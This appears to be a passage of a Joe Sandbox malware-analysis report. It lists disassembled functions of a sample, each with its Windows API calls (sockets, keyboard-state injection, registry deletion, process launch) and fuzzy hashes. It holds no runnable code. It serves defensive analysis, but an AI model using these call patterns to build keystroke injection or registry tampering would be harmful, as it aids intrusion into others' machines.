LeaveCriticalSection.KERNEL32(?), ref: 00EF71AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00EF71BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 00EF71DE

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 16bbc5121476c2e35007b1bbe06f6c62f803c0a60e028c2d86cf89d7130a678c
Instruction ID: eba5cbcd230bef57212bb02dce84f131d2d96540d70abb738d4d6e015e56b877
Opcode Fuzzy Hash: 16bbc5121476c2e35007b1bbe06f6c62f803c0a60e028c2d86cf89d7130a678c
Instruction Fuzzy Hash: EF315E71A00209EBDF00DFA4DC85AAFB7B8EF45710F1581B5E904AB256DB70EE14DBA0

Function 00F161D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00F161EB
GetDC.USER32(00000000), ref: 00F161F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F161FE
ReleaseDC.USER32(00000000,00000000), ref: 00F1620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F16246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F16257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F1902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00F16291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F162B1

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 705bd29c0dd81d62f086be150dadf4a27356fc0896ae06598d5ce13c137130ba
Instruction ID: 9131d70d557f631dc64e767a9cea7e1e03c19109f0009aeb8ce282b7a5ccd9b7
Opcode Fuzzy Hash: 705bd29c0dd81d62f086be150dadf4a27356fc0896ae06598d5ce13c137130ba
Instruction Fuzzy Hash: 3B317C72201214BFEF118F50DC8AFEA3BA9EF4A765F054065FE08EA291C6759C45DB60

Function 00EEBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00EEBBC4
_memcmp.LIBCMT ref: 00EEBBE6
_memcmp.LIBCMT ref: 00EEBBFE
_memcmp.LIBCMT ref: 00EEBC11
_memcmp.LIBCMT ref: 00EEBC2B
_memcmp.LIBCMT ref: 00EEBC3E
_memcmp.LIBCMT ref: 00EEBC56
_memcmp.LIBCMT ref: 00EEBC71

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 9a575220a0167827d824059b72269451754100bc4c1a49baf39de05ea11d5f92
Instruction ID: 7d1132341afd72a7cad190c5e5187c6cff14b6d10b67b112a95ef3a25478890c
Opcode Fuzzy Hash: 9a575220a0167827d824059b72269451754100bc4c1a49baf39de05ea11d5f92
Instruction Fuzzy Hash: D621057160525D7BE2056613ED52FFFB39C9E1036CF586420FD04B6647EB24DE11D2A2

Function 00EFEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00E99837: __itow.LIBCMT ref: 00E99862
Part of subcall function 00E99837: __swprintf.LIBCMT ref: 00E998AC

Part of subcall function 00EAFC86: _wcscpy.LIBCMT ref: 00EAFCA9

_wcstok.LIBCMT ref: 00EFEC94
_wcscpy.LIBCMT ref: 00EFED23
_memset.LIBCMT ref: 00EFED56

Strings

X, xrefs: 00EFED93

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 3fbb60f3fe96370f70cf677ff54fd09907b0ec0672d5db9a5f1d90cc9d82c414
Instruction ID: 0b088d2390e0bf4c7b48194cf12163d06075d68b16b944ef37d8912cedcefbee
Opcode Fuzzy Hash: 3fbb60f3fe96370f70cf677ff54fd09907b0ec0672d5db9a5f1d90cc9d82c414
Instruction Fuzzy Hash: 4BC173716083449FCB24EF24D845AAAB7E4FF85314F10592DF999AB3A2DB31EC45CB42

Function 00F06B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F06C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F06C21
WSAGetLastError.WSOCK32(00000000), ref: 00F06C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00F06CEA
inet_ntoa.WSOCK32(?), ref: 00F06CA7

Part of subcall function 00EEA7E9: _strlen.LIBCMT ref: 00EEA7F3
Part of subcall function 00EEA7E9: _memmove.LIBCMT ref: 00EEA815

_strlen.LIBCMT ref: 00F06D44
_memmove.LIBCMT ref: 00F06DAD

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: f9498a1e30072a259d07c665c0d3c6c69131024a947634f24013c5316d10b4e8
Instruction ID: b9f0850a027669691e01bd6efba5bd4b5a769c697f8dfb17c83f450d1e6d6746
Opcode Fuzzy Hash: f9498a1e30072a259d07c665c0d3c6c69131024a947634f24013c5316d10b4e8
Instruction Fuzzy Hash: 1681B5B2604300ABDB10EB24CC82F6BB7E8AF84724F54591DF955EB2E2DA70ED05D751

Function 00E91424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99eb91e1ca63b2982e3fe2094e5b15cc2f9a797fb8895510533185cc4b4f113d
Instruction ID: 2000870a6b6ff3d5464f703d997d92522e1088e323f0d579ade4f9d5bd06527c
Opcode Fuzzy Hash: 99eb91e1ca63b2982e3fe2094e5b15cc2f9a797fb8895510533185cc4b4f113d
Instruction Fuzzy Hash: 2E714B3090011AFFCF04DF98CC45AFEBBB9FF89314F158199E925AA251C734AA51DB60

Function 00F1B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01805D78), ref: 00F1B3EB
IsWindowEnabled.USER32(01805D78), ref: 00F1B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F1B4DB
SendMessageW.USER32(01805D78,000000B0,?,?), ref: 00F1B512
IsDlgButtonChecked.USER32(?,?), ref: 00F1B54F
GetWindowLongW.USER32(01805D78,000000EC), ref: 00F1B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F1B589

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: a5aeb4da6b2f13bfd5f4595de2a70e29aa312abaff5b4fa145aacb1563aec6bc
Instruction ID: f246419f870b8df651f5e1cfb23c13974f20b52292e0f317017f0ef15802bded
Opcode Fuzzy Hash: a5aeb4da6b2f13bfd5f4595de2a70e29aa312abaff5b4fa145aacb1563aec6bc
Instruction Fuzzy Hash: C8718F34A04208EFDB24DF55D894FFA7BB5EF09320F148059EA55972A2C732A990FB50

Function 00F0F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F0F448
_memset.LIBCMT ref: 00F0F511
ShellExecuteExW.SHELL32(?), ref: 00F0F556

Part of subcall function 00E99837: __itow.LIBCMT ref: 00E99862
Part of subcall function 00E99837: __swprintf.LIBCMT ref: 00E998AC

Part of subcall function 00EAFC86: _wcscpy.LIBCMT ref: 00EAFCA9

GetProcessId.KERNEL32(00000000), ref: 00F0F5CD
CloseHandle.KERNEL32(00000000), ref: 00F0F5FC

Strings

@, xrefs: 00F0F525

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: a92a6073601c0ae1d47c729087b45cba7d974ca5bda33307434e9947d1e1a491
Instruction ID: f703162c60027b7ed6ff154bd22c8b4d04800170defc71c3113073f2f10329b9
Opcode Fuzzy Hash: a92a6073601c0ae1d47c729087b45cba7d974ca5bda33307434e9947d1e1a491
Instruction Fuzzy Hash: 9F617975A006199FCF24DFA8C8819AEBBF5FF49320F14806DE815AB791DB30AD45DB90

Function 00EF0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00EF0F8C
GetKeyboardState.USER32(?), ref: 00EF0FA1
SetKeyboardState.USER32(?), ref: 00EF1002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00EF1030
PostMessageW.USER32(?,00000101,00000011,?), ref: 00EF104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00EF1095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00EF10B8

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 78ca9893d8493a242ee4cd4a80c6efb21f08891ca5bea5b26035d80408b90800
Instruction ID: 06ced5db71e56fa24d664f439e2e14405cf7aedc08248b1930151bb34c136feb
Opcode Fuzzy Hash: 78ca9893d8493a242ee4cd4a80c6efb21f08891ca5bea5b26035d80408b90800
Instruction Fuzzy Hash: B25113606047DDBDFB3642348C05BB6BEE95B06308F0895C9E2C5A58D3C698DCC8D750

Function 00EF0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00EF0DA5
GetKeyboardState.USER32(?), ref: 00EF0DBA
SetKeyboardState.USER32(?), ref: 00EF0E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00EF0E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00EF0E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00EF0EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00EF0EC9

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 0aee4ed909fbf6305b15556242c7a1df917782edb9be6e9875081726a995f036
Instruction ID: db35cdae8ebe1da032364af211572a71cf175e95cb4eb96c0ce03b5550aa73f6
Opcode Fuzzy Hash: 0aee4ed909fbf6305b15556242c7a1df917782edb9be6e9875081726a995f036
Instruction Fuzzy Hash: 455106A16047DD7EFB3283748C45BBABFE95B06304F089889F2D4664C3D395AC98E750

Function 00EF55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00EF560A
_wcsncpy.LIBCMT ref: 00EF563F
_wcsncpy.LIBCMT ref: 00EF5671
_wcsncpy.LIBCMT ref: 00EF56A4
_wcsncpy.LIBCMT ref: 00EF56E6
_wcsncpy.LIBCMT ref: 00EF5720
_wcsncpy.LIBCMT ref: 00EF574F

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: f275a3624c61ba198f45f7791893c2035c34b1075c99f58e98833f50d2fdb740
Instruction ID: fec30a7d29d11564e9efcc1ec5ccdb22d70dd35a55209c14ed23f90261bd63fa
Opcode Fuzzy Hash: f275a3624c61ba198f45f7791893c2035c34b1075c99f58e98833f50d2fdb740
Instruction Fuzzy Hash: 9641C466C1021876CB11FBB49C869DFB3F89F04310F50A95AE718F3261EB34A245C7EA

Function 00EF3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EF3697,?), ref: 00EF468B

Part of subcall function 00EF466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EF3697,?), ref: 00EF46A4

lstrcmpiW.KERNEL32(?,?), ref: 00EF36B7
_wcscmp.LIBCMT ref: 00EF36D3
MoveFileW.KERNEL32(?,?), ref: 00EF36EB
_wcscat.LIBCMT ref: 00EF3733
SHFileOperationW.SHELL32(?), ref: 00EF379F

Strings

\*.*, xrefs: 00EF372D

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 82c5cab53c020326153b1bcdae0a0779101e3f80f19e90585f19bb824ad94d14
Instruction ID: d42940198a8e0e2b1dfbff6e2db6e0bdffacc5b8460dda564ba441ba8f3b268b
Opcode Fuzzy Hash: 82c5cab53c020326153b1bcdae0a0779101e3f80f19e90585f19bb824ad94d14
Instruction Fuzzy Hash: F54182B1508348AEC752EF74C4419EF77E8AF89384F00292EB599E3291EA34D689C756

Function 00F17291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F172AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F17351
IsMenu.USER32(?), ref: 00F17369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F173B1
DrawMenuBar.USER32 ref: 00F173C4

Strings

0, xrefs: 00F1729E

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 85ba8094e73f8c263d9e775599e6cf789230ac56da14923b6d5dcf66ae4c40a1
Instruction ID: e0416b8c037220240e64a368c1dc5684d7a2094b12f35d8c46d6ff2ed28c0e86
Opcode Fuzzy Hash: 85ba8094e73f8c263d9e775599e6cf789230ac56da14923b6d5dcf66ae4c40a1
Instruction Fuzzy Hash: A3411975A04308AFDB20EF50D884ADABBF5FB08361F149529FD1997250D730AD94EF60

Function 00F10FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F10FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F10FFE
FreeLibrary.KERNEL32(00000000), ref: 00F110B5

Part of subcall function 00F10FA5: RegCloseKey.ADVAPI32(?), ref: 00F1101B
Part of subcall function 00F10FA5: FreeLibrary.KERNEL32(?), ref: 00F1106D
Part of subcall function 00F10FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F11090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00F11058

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 22e04c8bebceacb08a061517300d12a619071986fce7d152575bd540e1e84c12
Instruction ID: 7769ba029f31f49ae84e435be5903599b2283e170fa62b1eb2a6c739b97988d5
Opcode Fuzzy Hash: 22e04c8bebceacb08a061517300d12a619071986fce7d152575bd540e1e84c12
Instruction Fuzzy Hash: 9A31EC71D01109BFDB25DB90DC89AFFB7BCEF08350F004169E616A2151EA749EC9AAA0

Function 00F162CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F162EC
GetWindowLongW.USER32(01805D78,000000F0), ref: 00F1631F
GetWindowLongW.USER32(01805D78,000000F0), ref: 00F16354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F16386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F163B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00F163C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F163DB

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: ecdb4886bdba7f4043d880d7dc26f9981bf4c0d74b75d9c7dff51bf3c4a829fc
Instruction ID: 8730a2b8ef47ee4fb6529d8cf6cbd237181d519b31ccb38faebdda95fa91273f
Opcode Fuzzy Hash: ecdb4886bdba7f4043d880d7dc26f9981bf4c0d74b75d9c7dff51bf3c4a829fc
Instruction Fuzzy Hash: 5431F231A442549FEB20CF19DC84F9437E1BB4A725F1941A4FA25CB3B1CB71A884AB50

Function 00EEDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EEDB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EEDB54
SysAllocString.OLEAUT32(00000000), ref: 00EEDB57
SysAllocString.OLEAUT32(?), ref: 00EEDB75
SysFreeString.OLEAUT32(?), ref: 00EEDB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 00EEDBA3
SysAllocString.OLEAUT32(?), ref: 00EEDBB1

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: b3d76db2e8f766e6310598172607126b84e647fdf8582691a68ab7f8a406c0f1
Instruction ID: 9c171ad6e9607cd3e1ac4ca072e1e3982da150070a1832e282303aef7fec99d6
Opcode Fuzzy Hash: b3d76db2e8f766e6310598172607126b84e647fdf8582691a68ab7f8a406c0f1
Instruction Fuzzy Hash: 4B21923660421DAFDF10DFA9DC88CFB73ACEB09364B018525F914EB2A0E670EC459760

Function 00F06173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F07DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F061C6
WSAGetLastError.WSOCK32(00000000), ref: 00F061D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F0620E
connect.WSOCK32(00000000,?,00000010), ref: 00F06217
WSAGetLastError.WSOCK32 ref: 00F06221
